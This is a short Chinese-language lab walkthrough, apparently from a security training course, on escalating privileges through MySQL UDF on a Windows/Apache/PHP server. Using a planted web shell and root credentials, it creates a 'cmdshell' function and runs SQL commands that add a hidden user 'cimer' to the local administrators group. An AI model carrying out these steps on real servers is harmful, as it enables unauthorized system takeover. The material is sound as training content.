本实验主要介绍Mysql数据库的提权，通过本实验可以掌握当服务器装用Mysql数据库时如何获取服务器权限。 

1.2实验环境

服务器配置：windows+apache+php+Mysql

密码信息： Mysql数据库用户名/密码：root/123123        

实验目标：http://xx.xx.xx.xx/code.php      大马密码：admin 

1.3实验步骤

Mysql数据库提权

Mysql数据库提权主要是利用udf方法提权。

①、首先访问页面http://xx.xx.xx.xx/code.php

②、上传udf提权马，

Host输入：localhost

Name输入：root

Pass输入：123123

Database输入：mysql 

③、点击导出udf

④、点自带命令中的创建cmdshell

⑤、然后在自定义Sql语句中输入：select cmdshell(‘net user cimer 123456 /add’)

⑥、继续输入语句：select cmdshell(‘net localgroup administrators cimer /add’)

 ⑦、继续输入语句：select cmdshell(‘net user’) 

⑧、成功添加cimer用户。